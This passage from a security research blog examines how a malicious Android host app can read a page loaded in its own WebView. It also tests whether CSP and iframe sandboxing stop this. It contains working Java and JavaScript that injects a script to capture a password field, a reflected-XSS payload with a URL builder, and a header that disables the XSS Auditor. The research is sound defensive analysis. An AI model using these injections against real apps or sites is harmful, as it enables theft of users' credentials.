Note that there is addJavascriptInterface as well. This is what many blogs (quoted in the beginning of this blog) talk about, where the loaded web page can potentially be harmful to the underlying app. In our use case however, it is not of much consequence (from that perspective). All that it is used for is to show that BullyGiant could read the contents of the page loaded in the webview. It does so by sending the read content back to android (that's where addJavascriptInterface is used) & having it displayed as a toast message.

The other important bit in the BullyGiant code base is the overridden onPageFinished():

```java
...
super.onPageFinished(view, url);
mywebview.loadUrl("javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ androidAppProxy.showMessage(\"Password : \" + document.getElementById(\"password\").value); return false; },false);");
...
```

That's where the javascript to read the password field from the DOM is injected into the page loaded inside the webview.
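The injected string is easier to follow when it is assembled piece by piece. Below is a minimal sketch in plain Java (no Android dependencies) of how such a `javascript:` URL could be built. The class name `InjectionPayload` and the helper `jsQuote` are hypothetical and not part of the BullyGiant code base; only the resulting script mirrors the snippet above.

```java
// Hypothetical helper, not taken from BullyGiant: builds the "javascript:" URL
// that onPageFinished() hands to WebView.loadUrl().
final class InjectionPayload {

    // Escapes backslashes and double quotes so a value can sit inside a JS string literal.
    static String jsQuote(String value) {
        return "\"" + value.replace("\\", "\\\\").replace("\"", "\\\"") + "\"";
    }

    // buttonName: name attribute of the submit button.
    // fieldId: id attribute of the input whose value should be read.
    static String build(String buttonName, String fieldId) {
        return "javascript:"
                + "var button = document.getElementsByName(" + jsQuote(buttonName) + ")[0];"
                + "button.addEventListener(\"click\", function(){"
                + " androidAppProxy.showMessage(\"Password : \" + document.getElementById("
                + jsQuote(fieldId) + ").value);"
                + " return false; }, false);";
    }

    public static void main(String[] args) {
        // In the app, this string would be passed to mywebview.loadUrl(...).
        System.out.println(build("submit", "password"));
    }
}
```

The `androidAppProxy` object referenced in the script only exists inside the page because the app registered it through addJavascriptInterface, so the same string would fail in a regular browser.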

The story line continued...

AppAwesome came up with the below solutions to prevent the web page from being read by the underlying app:



Suggestion #1: Use CSP

Use



CSPto prevent BullyGiant from executing any javascript whatsoever inside the page loaded in the iframeSuggestion #2: Use Iframe Sandbox

Load the sensitive page inside of an iframe on the main page in the webview. Use

iframe sandboxto restrict any interactions between the parent window/page & the iframe content.CSP is a mechanism to prevent execution of untrusted javascript inside a web page. While the sandbox attribute of iframe is a way to tighten the controls of the page within an iframe. It's very well explained in many resources like here.
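To make the two suggestions concrete, here is a rough sketch of what a backend could emit for each of them. Everything specific in it is an assumption made for illustration: the policy value `default-src 'self'`, the `allow-forms` sandbox token, the `/checkout` path and the class name `CheckoutHardening`. The actual values used by AppAwesome are not reproduced in the text.

```java
import java.util.LinkedHashMap;
import java.util.Map;

// Hypothetical illustration of the two suggestions; not AppAwesome's real code.
final class CheckoutHardening {

    // Suggestion #1: response headers carrying a CSP (assumed policy value).
    static Map<String, String> responseHeaders() {
        Map<String, String> headers = new LinkedHashMap<>();
        headers.put("Content-Type", "text/html; charset=utf-8");
        headers.put("Content-Security-Policy", "default-src 'self'");
        return headers;
    }

    // Suggestion #2: wrapper page that loads the sensitive page in a sandboxed iframe.
    // "allow-forms" is an assumed choice so the password form can still be submitted;
    // scripts stay disabled inside the frame because "allow-scripts" is not listed.
    static String wrapperPage(String checkoutUrl) {
        return "<!DOCTYPE html><html><body>"
                + "<iframe sandbox=\"allow-forms\" src=\"" + checkoutUrl + "\"></iframe>"
                + "</body></html>";
    }

    public static void main(String[] args) {
        responseHeaders().forEach((name, value) -> System.out.println(name + ": " + value));
        System.out.println(wrapperPage("/checkout"));
    }
}
```

Both controls are enforced by whatever renders the page, which is why the rest of the analysis compares a normal browser with a webview.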

With all the above restrictions imposed, our goal now would be to see if BullyGiant can still access the AppAwesome page loaded inside the webview or not. We would go about analyzing how each of the suggested solutions works in a normal browser & in a webview, & how BullyGiant could access the loaded pages, if at all.

Exploring CSP With Inline JS

Apps used in this section:

Before moving on to the demo of CSP implementation & its effect/s on Android Webview, let's look at how a non-CSP page behaves in the normal (non-webview) browser & a webview.



To demo this we have added an inline JS that would alert 1 on clicking of the submit button before proceeding to the success checkout page. AppAwesome code snippet:

```html
<!DOCTYPE HTML>
...
<script type="text/javascript">
  function f(){
    alert(1);
  }
</script>
...
<input type="submit" value="Submit" name="submit" onclick="f();">
...
</html>
```

AppAwesome when accessed from the browser & when the Submit button is clicked:

Vanilla AppAwesome Page - Inline JS => Firefox 74.0

AppAwesome when accessed from BullyGiant app:



Vanilla AppAwesome Page - Inline JS => Android Webview

The above suggests that so far there is no change in how the page is treated by the 2 environments. Now let's check the change in behavior (if at all) when CSP headers are implemented.

With CSP Implemented

Apps used in this section:



Browser

A quick demo of these features on a traditional browser (not webview) suggests that these controls are indeed useful (when implemented the right way) for what they are intended to do.

AppAwesome when accessed from a browser:



CSP AppAwesome page - Inline JS => Firefox 74.0

Notice the Content Security Policy violations. These violations happen because of the CSP response headers, returned by the backend & enforced by the browser.

Response headers from AppAwesome:

CSP AppAwesome page - Inline JS => Firefox 74.0





Android Webview

AppAwesome when accessed from BullyGiant gives the same Authenticate Payment page as above & the exact same CSP errors too! This can be seen from the below screenshot of a remote debugging session taken from Chrome 80.0:

(Firefox was not chosen for remote debugging because I was too lazy to set up remote debugging on Firefox. Firefox set up on the AVD was required too, as per this from the FF settings page. Also, further down, for all the demos we use adb logs instead of remote debugging sessions to show browser console messages.)

On Google Chrome 80.0

Hence, we see that CSP does prevent execution of inline JS inside android webview, very much like a normal browser does.
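Why the inline `onclick` handler gets refused can be reasoned about with a small, deliberately simplified check. The sketch below is an assumption-laden approximation, not the browser's actual algorithm: it only looks at `script-src` (falling back to `default-src`) and the `'unsafe-inline'` keyword, and ignores nonces, hashes, `'strict-dynamic'` and the `script-src-elem` / `script-src-attr` directives. The class and method names are hypothetical.

```java
import java.util.Arrays;
import java.util.List;

// Simplified, hypothetical model of how a CSP decides about inline script.
final class InlineScriptCheck {

    // Returns the source list of a directive, or null when the directive is absent.
    static List<String> sources(String policy, String directive) {
        for (String part : policy.split(";")) {
            String[] tokens = part.trim().split("\\s+");
            if (tokens[0].equalsIgnoreCase(directive)) {
                return Arrays.asList(tokens).subList(1, tokens.length);
            }
        }
        return null;
    }

    // True when the policy would refuse inline <script> blocks and inline handlers
    // under the simplifications described above.
    static boolean blocksInlineScript(String policy) {
        List<String> list = sources(policy, "script-src");
        if (list == null) {
            list = sources(policy, "default-src"); // script-src falls back to default-src
        }
        if (list == null) {
            return false; // no directive governs scripts, so nothing is blocked
        }
        for (String source : list) {
            if (source.equalsIgnoreCase("'unsafe-inline'")) {
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        System.out.println(blocksInlineScript("default-src 'self'"));
        System.out.println(blocksInlineScript("script-src 'self' 'unsafe-inline'"));
    }
}
```

The same decision is made by the rendering engine in both environments, which matches the identical violations seen in Firefox and in the webview.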

Exploring CSP With Injected JS

Apps used in this section:

- AppAwesome

- AppAwesome (with XSS-Auditor disabled)

- BullyGiant (without XSS payload)

- BullyGiant (with XSS payload)

AppAwesome has been made deliberately vulnerable to a reflected XSS by adding a query parameter, name, to the home page. Also, all inline JS has been removed from this page to further emphasize CSP's impact on injected JS.

AppAwesome when accessed from the browser while the name query parameter's value is John Doe:

On Google Chrome 80.0



Now, for the sake of the demo, we would exploit the XSS vulnerable name query param to add an onclick event to the Submit button such that clicking it would alert "injected 1"

XSS exploit payload

```html
<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}</script>
```

AppAwesome when accessed from the browser & exploited with the above payload (in name query parameter):

Vanilla AppAwesome Page - Exploited XSS => Firefox

AppAwesome when accessed from BullyGiant, without exploiting the XSS:

Vanilla AppAwesome Page - Vulnerable param => Android Webview



AppAwesome when accessed from BullyGiant, while attempting to exploit the XSS, produces the same screen as above. However, contrary to the script injection that was successful in the case of a normal browser, this time clicking on the Submit button didn't execute the payload at all. We were instead taken directly to the checkout page. The adb logs, however, did produce an interesting message as shown below:

Vanilla AppAwesome Page - Exploited XSS => Android Webview

The adb log message is:

```
03-27 12:29:33.672 26427-26427/com.example.webviewinjection I/chromium: [INFO:CONSOLE(9)] "The XSS Auditor refused to execute a script in 'http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header.", source: http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E (9)
```

So even without any explicit protection mechanism/s (like CSP or iframe sandbox), android webview seems to have a default protection mechanism called XSS Auditor. This however has nothing to do with our use case. Moreover, it hinders our demo as well. Hence, for the sake of this demo, we would make AppAwesome return the X-XSS-Protection HTTP header, as below, to take care of this issue.

```
X-XSS-Protection: 0
```

Note: As an aside, a bypass of the XSS Auditor is also covered towards the end of the blog.

AppAwesome when accessed now from BullyGiant, while attempting to exploit the XSS:

Vanilla AppAwesome Page - Exploited XSS => Android Webview

Thus we see that the XSS payload works equally well even in the Android Webview (of course with the XSS Auditor intentionally disabled).

Note: If the victim is the page getting loaded inside webview, it makes absolute sense that its backend would never ever return any HTTP headers, like the above, that could weaken the security of the page itself. We will see why this is irrelevant further down.

The other thing to note is that there was a subtle difference between how the payloads were injected in the vulnerable parameter in the two cases, the browser & the webview. It is important to take note of it because it highlights the very premise of this blog post. In the case of the browser, the attacker is an external party, who could send the JS payload to exploit the vulnerable name parameter. In the case of the android webview, however, the underlying app itself is the malicious actor & hence it injects the JS payload in the vulnerable name parameter before loading the page in its own webview. This difference would be more prominent when we analyze further cases & how the malicious app leverages its capabilities to exploit the page loaded in the webview.
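As a rough illustration of the app-side injection, the sketch below builds the URL that a malicious host app could hand to its own webview. It is plain Java with hypothetical names (`XssUrlBuilder`, `build`), and it percent-encodes the whole payload with `URLEncoder`, which is an assumption: the adb log above suggests BullyGiant passed the payload mostly unencoded. The host and path are taken from that log.

```java
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

// Hypothetical helper: places the XSS payload in the vulnerable "name" parameter.
final class XssUrlBuilder {

    // The exploit payload shown earlier in this section.
    static final String PAYLOAD =
            "<body onload=\"f()\"><script type=\"text/javascript\">"
            + "function f(){var button=document.getElementsByName(\"submit\")[0];"
            + "button.addEventListener(\"click\", function(){ alert(\"injected 1\"); return false; },false);}"
            + "</script>";

    // URLEncoder applies form encoding (spaces become '+'), which servers
    // commonly decode back to spaces for query parameters.
    static String build(String baseUrl, String payload) {
        return baseUrl + "?name=" + URLEncoder.encode(payload, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        String url = build("http://192.168.1.35:31337/home", PAYLOAD);
        // In the app, this URL would be passed to mywebview.loadUrl(url).
        System.out.println(url);
        // Decoding the parameter gives back the original payload.
        String encoded = url.substring(url.indexOf("?name=") + "?name=".length());
        System.out.println(URLDecoder.decode(encoded, StandardCharsets.UTF_8).equals(PAYLOAD));
    }
}
```

No user interaction or phishing link is needed here: the app decides which URL its webview loads, so the "attacker-controlled input" is simply part of the app's own code.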

With CSP Implemented

Apps used in this section:

- AppAwesome

- BullyGiant (with XSS payload)

- BullyGiant (with CSP bypass)

- BullyGiant (with CSP bypass reading the password field)

Browser

With the appropriate CSP headers in place, inline JS does not work in browsers as we saw above. What would happen if javascript is injected in the page that has CSP headers? Would it still have CSP violation errors?

AppAwesome, with vulnerable name parameter & XSS-Auditor disabled, when accessed in the browser & the name query param exploited with the same XSS payload (as earlier):

CSP AppAwesome Page - Exploited XSS => Firefox

The console error messages are the same as with inline JS. Injected JS does not get executed as the CSP policy prevents it. Would the same XSS payload work when the above CSP page is loaded inside Android Webview?

AppAwesome when accessed from BullyGiant app that injects the JS payload in the vulnerable name parameter before loading the page in the android webview:

CSP AppAwesome Page - Exploited XSS => Android Webview

The same adb log is produced, confirming that CSP works well even against a javascript payload injected inside a webview.

Note: In the CSP related examples above (browser or webview), CSP kicks in before the page actually gets loaded.





With the above note, some interrelated questions that arise are:

- What would happen if BullyGiant wanted to access the contents of the page after it gets successfully loaded?

- Could it add javascript to the already loaded page, as if this were being done locally?

- Would CSP still interfere?